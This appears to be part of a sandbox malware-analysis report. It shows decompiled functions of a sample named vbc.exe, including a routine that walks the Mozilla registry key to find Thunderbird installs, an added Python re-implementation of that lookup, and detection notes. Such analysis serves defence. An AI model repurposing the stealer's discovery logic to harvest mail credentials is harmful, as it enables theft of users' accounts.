                                                                                                                                                                        							_push("%s\\bin");
                                                                                                                                                                        							_push(0x3ff);
                                                                                                                                                                        							_push( &_v2076);
                                                                                                                                                                        							L00412108();
                                                                                                                                                                        							E0040F232(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
                                                                                                                                                                        							_t71 =  &_v532;
                                                                                                                                                                        							_push(0x5c);
                                                                                                                                                                        							_push(_t71);
                                                                                                                                                                        							L0041210E();
                                                                                                                                                                        							_t93 = _t93 + 0x44;
                                                                                                                                                                        							if(_t71 != 0) {
                                                                                                                                                                        								 *_t71 = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v532 != 0 && E0040FA2B( &_v532) != 0) {
                                                                                                                                                                        								_push( &_v788);
                                                                                                                                                                        								_t75 =  &_v268;
                                                                                                                                                                        								L0041207E();
                                                                                                                                                                        								_t84 = _t75;
                                                                                                                                                                        								if(_t75 > 0) {
                                                                                                                                                                        									strcpy( &_v1052,  &_v532);
                                                                                                                                                                        									strcpy( &_v788,  &_v268);
                                                                                                                                                                        									_t93 = _t93 + 0x10;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                        						_t59 = E0040F276(_v8, _v12,  &_v268);
                                                                                                                                                                        						_t92 = _t93 + 0xc;
                                                                                                                                                                        					}
                                                                                                                                                                        					RegCloseKey(_v8);
                                                                                                                                                                        					goto L12;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
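Worked example, added here and not part of the sample or of the Joe Sandbox report: a Python re-implementation of the install-directory lookup in the decompiled function above, so the registry reads it performs can be reasoned about without running the malware. The registry is modeled as a nested dict standing in for HKLM\SOFTWARE\Mozilla, the unnamed path probe E0040FA2B is modeled as a caller-supplied existence predicate, the unresolved compare at L0041207E is assumed to be a numeric version ordering, and the 0x5c search is assumed to cut at the last backslash. The second fallback (E0040617C) is not resolved on this page and appears only as whatever extra entries the caller puts in the fallback list. All input data is constructed.

```python
# Added example (not the sample's code): model of the HKLM\SOFTWARE\Mozilla lookup
# from the decompiled function, runnable on any OS against constructed data.

# Fallback 1 from the decompile: %programfiles%\Mozilla Thunderbird (expanded by hand here).
THUNDERBIRD_FALLBACK = "C:\\Program Files\\Mozilla Thunderbird"

# Constructed stand-in for HKLM\SOFTWARE\Mozilla: subkey name -> {"bin": {"PathToExe": ...}}.
CONSTRUCTED_REGISTRY = {
    "Mozilla Thunderbird 78.14.0": {
        "bin": {"PathToExe": "C:\\Program Files (x86)\\Mozilla Thunderbird\\thunderbird.exe"}},
    "Mozilla Thunderbird 91.5.0": {
        "bin": {"PathToExe": "C:\\Program Files\\Mozilla Thunderbird\\thunderbird.exe"}},
    "Mozilla Thunderbird 102.0.0": {                      # stale entry, directory no longer exists
        "bin": {"PathToExe": "D:\\stale\\Thunderbird\\thunderbird.exe"}},
    "Extensions": {},                                     # does not start with "mozilla": skipped
}

# Constructed set of directories that "exist"; stands in for the E0040FA2B probe.
CONSTRUCTED_EXISTING = {
    "C:\\Program Files (x86)\\Mozilla Thunderbird",
    "C:\\Program Files\\Mozilla Thunderbird",
}


def _version_key(name):
    """Assumed ordering for the unresolved compare at L0041207E: numeric tuple of the
    dotted version after the product name, e.g. 'Mozilla Thunderbird 91.5.0' -> (91, 5, 0)."""
    tail = name.rsplit(" ", 1)[-1]
    key = []
    for part in tail.split("."):
        digits = "".join(ch for ch in part if ch.isdigit())
        key.append(int(digits) if digits else 0)
    return tuple(key)


def expected_registry_reads(registry):
    """Values the loop reads for a given key layout: every subkey whose first seven bytes
    match 'mozilla' case-insensitively gets its bin\\PathToExe value read, whether or not
    the directory is later accepted. This is the registry-access artifact a detection sees."""
    return ["HKLM\\SOFTWARE\\Mozilla\\" + k + "\\bin\\PathToExe"
            for k in registry if k[:7].lower() == "mozilla"]


def find_mozilla_dir(registry, path_exists, fallbacks):
    """Mirror of the decompiled control flow. Returns the chosen directory or '' if
    nothing survived the checks (the original returns 1 / 0 for the same outcome)."""
    best_dir, best_name = "", ""                     # _v1052 and _v788 in the decompile
    for subkey, values in registry.items():
        if subkey[:7].lower() != "mozilla":          # _mbsnbicmp(subkey, "mozilla", 7)
            continue
        exe = values.get("bin", {}).get("PathToExe", "")
        # cut at the backslash (0x5c); assumed to be the last one so the directory remains
        directory = exe.rsplit("\\", 1)[0] if "\\" in exe else exe
        if not directory or not path_exists(directory):
            continue
        if not best_name or _version_key(subkey) > _version_key(best_name):
            best_dir, best_name = directory, subkey  # newer entry replaces the stored one
    if best_dir:
        return best_dir
    for candidate in fallbacks:                      # %programfiles% dir, then the unresolved
        if candidate and path_exists(candidate):     # E0040617C dir, then the current directory
            return candidate
    return ""


if __name__ == "__main__":
    print(expected_registry_reads(CONSTRUCTED_REGISTRY))
    print(find_mozilla_dir(CONSTRUCTED_REGISTRY, CONSTRUCTED_EXISTING.__contains__,
                           [THUNDERBIRD_FALLBACK]))
```

For hunting, the observable sequence is a process that is not a Mozilla product enumerating HKLM\SOFTWARE\Mozilla, reading each <subkey>\bin\PathToExe, and then probing %programfiles%\Mozilla Thunderbird; that is the behaviour the report summarizes as stealing mail credentials via registry access.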
Statement addresses (the report's per-statement address column for the decompiled code above):
0x0040faba
0x0040fac4
0x0040faca
0x0040fadc
0x0040fae2
0x0040faf5
0x0040faf7
0x0040fafc
0x0040fb01
0x0040fc57
0x0040fc5f
0x0040fc68
0x0040fc71
0x0040fc7f
0x0040fc81
0x0040fc81
0x0040fc85
0x0040fc87
0x0040fc94
0x0040fc96
0x0040fc96
0x0040fc9a
0x0040fc9e
0x0040fcac
0x0040fcae
0x0040fcae
0x0040fcac
0x0040fc9a
0x0040fc85
0x0040fcbb
0x0040fb07
0x0040fb14
0x0040fb1a
0x0040fb2a
0x0040fb2d
0x0040fb32
0x0040fc46
0x0040fb3a
0x0040fb3c
0x0040fb42
0x0040fb47
0x0040fb48
0x0040fb4d
0x0040fb52
0x0040fb61
0x0040fb67
0x0040fb79
0x0040fb7f
0x0040fb8a
0x0040fb8b
0x0040fb96
0x0040fb9b
0x0040fb9c
0x0040fbb8
0x0040fbbd
0x0040fbc3
0x0040fbc5
0x0040fbc6
0x0040fbcb
0x0040fbd0
0x0040fbd2
0x0040fbd2
0x0040fbda
0x0040fbf2
0x0040fbf3
0x0040fbfa
0x0040fc02
0x0040fc03
0x0040fc13
0x0040fc26
0x0040fc2b
0x0040fc2b
0x0040fc03
0x0040fbda
0x0040fc2e
0x0040fc3e
0x0040fc43
0x0040fc43
0x0040fc51
0x00000000
0x0040fc51

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040FACA
                                                                                                                                                                        • memset.MSVCRT ref: 0040FAE2
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                        • memset.MSVCRT ref: 0040FB1A
                                                                                                                                                                          • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                        • _mbsnbicmp.MSVCRT ref: 0040FB48
                                                                                                                                                                        • memset.MSVCRT ref: 0040FB67
                                                                                                                                                                        • memset.MSVCRT ref: 0040FB7F
                                                                                                                                                                        • _snprintf.MSVCRT ref: 0040FB9C
                                                                                                                                                                        • _mbsrchr.MSVCRT ref: 0040FBC6
                                                                                                                                                                        • _mbsicmp.MSVCRT ref: 0040FBFA
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?), ref: 0040FC13
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 0040FC26
                                                                                                                                                                        • RegCloseKey.ADVAPI32(0040FD0A), ref: 0040FC51
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC5F
                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040FC71
                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC9E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                                                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                                        • API String ID: 3269028891-3267283505
                                                                                                                                                                        • Opcode ID: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                                                                                                                                                                        • Instruction ID: 1ceab4daf47746688ac62aede77486c23684b0aa94ce4f67dad83c1e3abd437f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                                                                                                                                                                        • Instruction Fuzzy Hash: 3851C67194515DBEDB31E7A18D42EDB7BACAF14304F0004FAB684F2141EA789FC98B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                        			E0040F797(void* __edi, char* _a4, char* _a8) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				void _v263;
                                                                                                                                                                        				char _v264;
                                                                                                                                                                        				void _v519;
                                                                                                                                                                        				char _v520;
                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                        				void* _t58;
                                                                                                                                                                        				char* _t60;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                        
                                                                                                                                                                        				_t58 = __edi;
                                                                                                                                                                        				_v264 = 0;
                                                                                                                                                                        				memset( &_v263, 0, 0xfe);
                                                                                                                                                                        				_v520 = 0;
                                                                                                                                                                        				memset( &_v519, 0, 0xfe);
                                                                                                                                                                        				_t62 = _t61 + 0x18;
                                                                                                                                                                        				_v8 = 1;
                                                                                                                                                                        				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t60 = _a4;
                                                                                                                                                                        				 *_t60 = 0;
                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                        					strcpy(_t60, "<font");
                                                                                                                                                                        					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                                        					if(_t32 > 0) {
                                                                                                                                                                        						sprintf( &_v264, " size=\"%d\"", _t32);
                                                                                                                                                                        						strcat(_t60,  &_v264);
                                                                                                                                                                        						_t62 = _t62 + 0x14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                                        					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                                                                        						sprintf( &_v264, " color=\"#%s\"", E0040F6E2(_t33,  &_v520));
                                                                                                                                                                        						strcat(_t60,  &_v264);
                                                                                                                                                                        					}
                                                                                                                                                                        					strcat(_t60, ">");
                                                                                                                                                                        				}
                                                                                                                                                                        				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                                        					strcat(_t60, "<b>");
                                                                                                                                                                        				}
                                                                                                                                                                        				strcat(_t60, _a8);
                                                                                                                                                                        				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                                        					strcat(_t60, "</b>");
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                        					strcat(_t60, "</font>");
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t60;
                                                                                                                                                                        			}
                                                                                                                                                                        0x0040f797
                                                                                                                                                                        0x0040f7b2
                                                                                                                                                                        0x0040f7b8
                                                                                                                                                                        0x0040f7c6
                                                                                                                                                                        0x0040f7cc
                                                                                                                                                                        0x0040f7d1
                                                                                                                                                                        0x0040f7d8
                                                                                                                                                                        0x0040f7df
                                                                                                                                                                        0x0040f7e6
                                                                                                                                                                        0x0040f7e6
                                                                                                                                                                        0x0040f7ec
                                                                                                                                                                        0x0040f7ef
                                                                                                                                                                        0x0040f7f1
                                                                                                                                                                        0x0040f7f9
                                                                                                                                                                        0x0040f7fe
                                                                                                                                                                        0x0040f805
                                                                                                                                                                        0x0040f814
                                                                                                                                                                        0x0040f821
                                                                                                                                                                        0x0040f826
                                                                                                                                                                        0x0040f826
                                                                                                                                                                        0x0040f829
                                                                                                                                                                        0x0040f82f
                                                                                                                                                                        0x0040f84b
                                                                                                                                                                        0x0040f858
                                                                                                                                                                        0x0040f85d
                                                                                                                                                                        0x0040f866
                                                                                                                                                                        0x0040f86c
                                                                                                                                                                        0x0040f870
                                                                                                                                                                        0x0040f878
                                                                                                                                                                        0x0040f87e
                                                                                                                                                                        0x0040f883
                                                                                                                                                                        0x0040f88d
                                                                                                                                                                        0x0040f895
                                                                                                                                                                        0x0040f89b
                                                                                                                                                                        0x0040f89f
                                                                                                                                                                        0x0040f8a7
                                                                                                                                                                        0x0040f8ad
                                                                                                                                                                        0x0040f8b3

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040F7B8
                                                                                                                                                                        • memset.MSVCRT ref: 0040F7CC
                                                                                                                                                                        • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F7F9
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040F814
                                                                                                                                                                        • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F821
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040F84B
                                                                                                                                                                        • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F858
                                                                                                                                                                        • strcat.MSVCRT(?,00414E74,?,?,?,?,?), ref: 0040F866
                                                                                                                                                                        • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F878
                                                                                                                                                                        • strcat.MSVCRT(?,004097A4,?,?,?,?,?), ref: 0040F883
                                                                                                                                                                        • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F895
                                                                                                                                                                        • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F8A7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcat$memsetsprintf$strcpy
                                                                                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                        • API String ID: 1662040868-1996832678
                                                                                                                                                                        • Opcode ID: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                                                                                                                                                                        • Instruction ID: 1d89f71d6803e1250473f580c1fd87552222ed23aec69fbe6c7d3cec9cc88889
                                                                                                                                                                        • Opcode Fuzzy Hash: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                                                                                                                                                                        • Instruction Fuzzy Hash: C731E673905714AEC720AA659D42DCBB76CAF14324F1082BFF214A2182D7BC9AD4CA9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040B031(void* __eax, intOrPtr _a4) {
                                                                                                                                                                        				char _v271;
                                                                                                                                                                        				char _v532;
                                                                                                                                                                        				intOrPtr _v536;
                                                                                                                                                                        				char _v540;
                                                                                                                                                                        				void _v803;
                                                                                                                                                                        				char _v804;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				char* _t47;
                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                        				WINDOWPLACEMENT* _t73;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        				char* _t83;
                                                                                                                                                                        				struct HWND__* _t84;
                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                        				int _t90;
                                                                                                                                                                        
                                                                                                                                                                        				_t75 = __eax;
                                                                                                                                                                        				_v804 = 0;
                                                                                                                                                                        				memset( &_v803, 0, 0x104);
                                                                                                                                                                        				GetModuleFileNameA(0,  &_v804, 0x104);
                                                                                                                                                                        				_t47 = strrchr( &_v804, 0x2e);
                                                                                                                                                                        				if(_t47 != 0) {
                                                                                                                                                                        					 *_t47 = 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				strcat( &_v804, ".cfg");
                                                                                                                                                                        				_v536 = _a4;
                                                                                                                                                                        				_v540 = 0x414c5c;
                                                                                                                                                                        				_v532 = 0;
                                                                                                                                                                        				_v271 = 0;
                                                                                                                                                                        				strcpy( &_v532,  &_v804);
                                                                                                                                                                        				strcpy( &_v271, "General");
                                                                                                                                                                        				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
                                                                                                                                                                        				_t16 =  &_v540; // 0x414c5c
                                                                                                                                                                        				 *((intOrPtr*)( *_t16 + 4))("ShowGridLines", _t88 + 4, 0);
                                                                                                                                                                        				_t20 =  &_v540; // 0x414c5c
                                                                                                                                                                        				 *((intOrPtr*)( *_t20 + 8))("SaveFilterIndex", _t88 + 8, 0);
                                                                                                                                                                        				_t24 =  &_v540; // 0x414c5c
                                                                                                                                                                        				 *((intOrPtr*)( *_t24 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
                                                                                                                                                                        				_t27 =  &_v540; // 0x414c5c
                                                                                                                                                                        				 *((intOrPtr*)( *_t27 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
                                                                                                                                                                        				_t67 = _v536;
                                                                                                                                                                        				_a4 = _t67;
                                                                                                                                                                        				_t90 = 0x2c;
                                                                                                                                                                        				if(_t67 != 0) {
                                                                                                                                                                        					_t84 =  *(_t75 + 0x108);
                                                                                                                                                                        					if(_t84 != 0) {
                                                                                                                                                                        						_t73 = _t75 + 0x128;
                                                                                                                                                                        						_t73->length = _t90;
                                                                                                                                                                        						GetWindowPlacement(_t84, _t73);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t35 =  &_v540; // 0x414c5c
                                                                                                                                                                        				_t36 =  &_v540; // 0x414c5c
                                                                                                                                                                        				_t83 = _t36;
                                                                                                                                                                        				 *((intOrPtr*)( *_t35 + 0xc))("WinPos", _t75 + 0x128, _t90);
                                                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                                                        					E00401823(_t75);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t40 =  &_v540; // 0x414c5c
                                                                                                                                                                        				return E004087DB( *((intOrPtr*)(_t75 + 0x370)), _t83, _t40);
                                                                                                                                                                        			}
                                                                                                                                                                        0x0040b043
                                                                                                                                                                        0x0040b04f
                                                                                                                                                                        0x0040b056
                                                                                                                                                                        0x0040b067
                                                                                                                                                                        0x0040b076
                                                                                                                                                                        0x0040b07f
                                                                                                                                                                        0x0040b081
                                                                                                                                                                        0x0040b081
                                                                                                                                                                        0x0040b090
                                                                                                                                                                        0x0040b098
                                                                                                                                                                        0x0040b0ac
                                                                                                                                                                        0x0040b0b6
                                                                                                                                                                        0x0040b0bd
                                                                                                                                                                        0x0040b0c4
                                                                                                                                                                        0x0040b0d5
                                                                                                                                                                        0x0040b0da
                                                                                                                                                                        0x0040b0e8
                                                                                                                                                                        0x0040b0f9
                                                                                                                                                                        0x0040b101
                                                                                                                                                                        0x0040b112
                                                                                                                                                                        0x0040b11a
                                                                                                                                                                        0x0040b12b
                                                                                                                                                                        0x0040b12e
                                                                                                                                                                        0x0040b144
                                                                                                                                                                        0x0040b147
                                                                                                                                                                        0x0040b151
                                                                                                                                                                        0x0040b154
                                                                                                                                                                        0x0040b155
                                                                                                                                                                        0x0040b157
                                                                                                                                                                        0x0040b15f
                                                                                                                                                                        0x0040b161
                                                                                                                                                                        0x0040b169
                                                                                                                                                                        0x0040b16b
                                                                                                                                                                        0x0040b16b
                                                                                                                                                                        0x0040b15f
                                                                                                                                                                        0x0040b179
                                                                                                                                                                        0x0040b184
                                                                                                                                                                        0x0040b184
                                                                                                                                                                        0x0040b18a
                                                                                                                                                                        0x0040b190
                                                                                                                                                                        0x0040b192
                                                                                                                                                                        0x0040b192
                                                                                                                                                                        0x0040b19d
                                                                                                                                                                        0x0040b1ac

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040B056
                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040B067
                                                                                                                                                                        • strrchr.MSVCRT ref: 0040B076
                                                                                                                                                                        • strcat.MSVCRT(00000000,.cfg), ref: 0040B090
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040B0C4
                                                                                                                                                                        • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040B0D5
                                                                                                                                                                        • GetWindowPlacement.USER32(?,?), ref: 0040B16B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                                                                                                        • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$\LA
                                                                                                                                                                        • API String ID: 1301239246-3877392175
                                                                                                                                                                        • Opcode ID: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                                                                                                                                                                        • Instruction ID: 0af9f59d4ba14ec1661be341c61033e05a04fd550f4be300a3a65ce9efdf479e
                                                                                                                                                                        • Opcode Fuzzy Hash: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                                                                                                                                                                        • Instruction Fuzzy Hash: F2414A72940118AFCB21DB54CC88FDABBBCAB58700F0441E6F509E7191DB749BC8CBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E004095F5(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				void _v79;
                                                                                                                                                                        				char _v80;
                                                                                                                                                                        				void _v131;
                                                                                                                                                                        				char _v132;
                                                                                                                                                                        				void _v183;
                                                                                                                                                                        				char _v184;
                                                                                                                                                                        				char _v236;
                                                                                                                                                                        				void _v491;
                                                                                                                                                                        				char _v492;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* _t83;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				char* _t103;
                                                                                                                                                                        				intOrPtr* _t120;
                                                                                                                                                                        				signed int _t121;
                                                                                                                                                                        				char _t139;
                                                                                                                                                                        				signed int _t152;
                                                                                                                                                                        				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F6E2(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405F07(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F6E2(_v28,  &_v184);
						E0040F70E( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F6E2(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F797( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405F07(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405F07(_a4, "</table><p>");
				return E00405F07(_a4, 0x413b1c);
			}

APIs
• memset.MSVCRT ref: 00409615
• memset.MSVCRT ref: 00409638
• memset.MSVCRT ref: 0040964E
• memset.MSVCRT ref: 0040965E
• sprintf.MSVCRT ref: 00409692
• strcpy.MSVCRT(00000000, nowrap), ref: 004096D9
• sprintf.MSVCRT ref: 00409760
• strcat.MSVCRT(?,&nbsp;), ref: 0040978F
  • Part of subcall function 0040F6E2: sprintf.MSVCRT ref: 0040F701
• strcpy.MSVCRT(?,?), ref: 00409774
• sprintf.MSVCRT ref: 004097C3
  • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
  • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Similarity
• API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 2822972341-601624466
• Opcode ID: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
• Instruction ID: ad5d45e3310275bf8c81aed9ad428c342ee671dbf73ea1c77541a84cad310e98
• Opcode Fuzzy Hash: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
• Instruction Fuzzy Hash: AA615032900214AFDF18DF94CC85EDE7B79EF08314F1001AAFA05A71D2DB79AA95CB59
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 58%
			E0040A02E(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
                                                                                                                                                                        				_t47 = __eax;
                                                                                                                                                                        				_t44 = __imp__ImageList_SetImageCount;
                                                                                                                                                                        				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
